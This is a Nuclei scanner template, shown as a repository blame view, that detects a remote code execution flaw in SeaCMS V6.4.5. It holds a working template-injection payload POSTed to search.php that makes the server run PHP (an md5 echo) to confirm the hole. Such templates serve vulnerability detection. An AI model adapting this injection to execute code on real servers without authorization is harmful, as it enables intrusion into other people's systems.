nuclei-templates/http/vulnerabilities/other/seacms-rce.yaml

33 lines
895 B
YAML
Raw Normal View History

2021-02-18 13:05:35 +00:00
id: seacms-rce
2021-02-18 13:05:35 +00:00
info:
name: SeaCMS V6.4.5 RCE
author: pikpikcu
severity: high
2021-10-26 12:29:20 +00:00
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
reference:
- https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: seacms,rce
2021-02-18 13:05:35 +00:00
http:
2021-02-18 13:05:35 +00:00
- method: POST
path:
- '{{BaseURL}}/search.php?searchtype=5'
2023-10-14 11:27:55 +00:00
2022-11-02 13:22:01 +00:00
body: "searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}"
2021-02-18 13:05:35 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-11-02 13:20:37 +00:00
words:
- "b1e597fa44dfd7669966bfab04eeb8ea"
2021-02-18 13:05:35 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100cc0bdc8dc85def9a276db0b6fa9532d5f962c63504225ff489e925fcb36a92a4022100b926ad486c8ae4d9c857e1ad0ea85116d9eb64f975820ec028ec00345320b4e0:922c64590222798bb761d5b6d8e72950